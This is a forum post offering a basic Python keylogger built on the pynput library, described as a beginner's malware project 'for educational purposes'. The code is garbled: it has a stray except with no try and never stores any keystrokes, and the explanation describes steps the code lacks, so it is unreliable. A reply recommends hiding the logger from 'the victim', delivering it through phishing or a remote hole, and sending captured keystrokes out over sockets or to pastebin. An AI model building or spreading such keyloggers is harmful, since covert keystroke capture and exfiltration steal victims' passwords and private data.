Keylogger :- A Basic Malware

Keyloggers are tools that record what a person types on a device. While there are legitimate and legal uses for keyloggers, many uses for keyloggers are malicious. In a keylogger attack, the keylogger software records every keystroke on the victim’s device and sends it to the attacker.

I am a beginner in Python and especially malware development in Windows. So I have made a keylogger for Windows, that is pretty basic, but probably a bit different from others.

*Please note that it was written for EDUCATIONAL PURPOSES
A keylogger is a tool that can track and record keystrokes, typically used to monitor keyboard activity. It can exist as either hardware or software, but this article will focus primarily on software keyloggers. When a key is pressed, the keylogger captures the input and can send it to its intended destination. Keyloggers may or may not be considered malware, depending on the context in which they are used. For example, parents may use keyloggers to monitor their child’s computer activity, or employers may use them to ensure that employees are following company policies. These types of applications are often referred to as Possibly Unwanted Programs (PUP) or Possibly Unwanted Applications (PUA).
Before start the program you have to install the ‘pynput ‘ library if you haven’t already. You can do this by running the following command in your terminal or command prompt:

pip install pynput

Let’s write the program

import pynput
from pynput.keyboard import Key, Listener

keys = []

def press(key):

        print('alphanumeric key {0} pressed'.format(key.char))
    except AttributeError:
        print('special key {0} pressed'.format(key))

def write_file(keys):
    with open('test.txt', 'w') as f:
        for key in keys:
            # removing ' '
            k = str(key).replace("'", "")

            # every keystroke for readability
            f.write(' ')

def release(key):
    print('{0} released'.format(key))
    if key == Key.esc:
        # stop listener
        return False

with Listener(on_press=press, on_release=release) as listener:

The program starts by importing the necessary modules from pynput.

It initializes an empty list called ‘keys‘ to store the captured keystrokes.

The ‘press‘ function is defined, which is called whenever a key is pressed. Inside this function, the pressed key is appended to the keys list, and then the ‘write_file‘ function is called to save the captured keystrokes to a file.

The ‘write_file‘ function takes the keys list as input and opens a file named ‘test.txt‘ in write mode. It iterates over each key in the list, removes the single quotes around the key representation (to improve readability), and writes the key value to the file. Additionally, it writes a space character after each key for readability purposes.

The ‘release‘ function is defined, which is called when a key is released. Inside this function, it prints the released key. If the released key is the “Esc” key, it returns False to stop the listener and terminate the program.

The program enters a with statement to create a Listener object from ‘pynput‘ using the ‘press‘ and ‘release‘ functions. The listener is responsible for capturing the keyboard events.

The listener starts capturing keyboard events using the listener.join() method. It will keep running in the background and capturing keystrokes until the program is terminated.

When executed, the program will log all the keystrokes in real-time and save them to the ‘test.txt‘ file. The program will also print a message indicating whether the pressed key is alphanumeric or a special key.



I think it would be wiser to make the keylogger a bit more specialized in the sense that it should use the interfaces the OS uses. Not only makes that the program lighter, which is important, but also will it be a lot less obvious whats happening to the victim. I don’t get this parasitic mind-virus of people trying to write everything in a certain language, like Rust or in this case Python in particular. Because how do you employ it in practice? Ok you have a target machine running Windows 10, so you connect to it via a remote hole or get it on through phishing, but how does it run exactly? Most Windows people don’t have a Python interpreter installed and all methods of making exe files from a Python script just result in huge executables. To be fair the library you mentioned could just be included in the file so you don’t have to install it, but still, it’s extremly impracticable.

There is the Windows.h that is on every Windows machine already preinstalled. Maybe make use of that with a C program. Just interface with Windows.h, get GetAsyncKeyState and log it somewhere. Windows has a socket library that you can use to send all the stuff back to you or somewhere else (pastebin for example).

1 Like

This topic was automatically closed after 121 days. New replies are no longer allowed.